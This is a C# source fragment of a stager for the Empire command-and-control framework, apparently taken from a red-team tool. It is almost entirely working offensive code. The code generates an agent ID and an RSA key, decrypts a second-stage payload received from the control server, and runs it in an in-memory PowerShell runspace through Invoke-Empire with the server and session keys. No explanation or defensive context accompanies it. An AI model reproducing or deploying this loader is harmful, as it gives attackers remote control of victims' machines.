static void Main(string[] args) { #if (COMMAND_LINE) if (args.Length < 3) { return; } SessionInfo sessionInfo = new SessionInfo(args); #endif #if (COMPILE_TIME) SessionInfo sessionInfo = new SessionInfo(); #endif #if (PRINT) Console.WriteLine("EmpireServer: {0}", sessionInfo.GetControlServers()); Console.WriteLine("StagingKey: {0}", sessionInfo.GetStagingKey()); Console.WriteLine("AgentLanguage: {0}", sessionInfo.GetAgentLanguage()); #endif (new EmpireStager(sessionInfo)).Execute(); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// public EmpireStager(SessionInfo sessionInfo) { stagingKeyBytes = Encoding.ASCII.GetBytes(sessionInfo.GetStagingKey()); Random random = new Random(); string characters = "ABCDEFGHKLMNPRSTUVWXYZ123456789"; char[] charactersArray = characters.ToCharArray(); StringBuilder sb = new StringBuilder(8); for (int i = 0; i < 8; i++) { int j = random.Next(charactersArray.Length); sb.Append(charactersArray[j]); } sessionInfo.SetAgentID(sb.ToString()); CspParameters cspParameters = new CspParameters(); cspParameters.Flags = cspParameters.Flags | CspProviderFlags.UseMachineKeyStore; rsaCrypto = new RSACryptoServiceProvider(2048, cspParameters); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private void PowershellEmpire(byte[] stage2Response) { string empire = Encoding.ASCII.GetString(aesDecrypt(sessionInfo.GetSessionKey(), stage2Response)); string execution = "Invoke-Empire"; execution += " -Servers \"" + sessionInfo.GetControlServers().First() + "\""; execution += " -StagingKey \"" + sessionInfo.GetStagingKey() + "\""; execution += " -SessionKey \"" + sessionInfo.GetSessionKey() + "\""; execution += " -SessionID \"" + sessionInfo.GetAgentID() + "\""; #if (PRINT) Console.WriteLine(execution); #endif using (Runspace runspace = RunspaceFactory.CreateRunspace()) { runspace.Open(); using (Pipeline pipeline = runspace.CreatePipeline()) { pipeline.Commands.AddScript(empire + ";" + execution + ";"); pipeline.Invoke(); } } }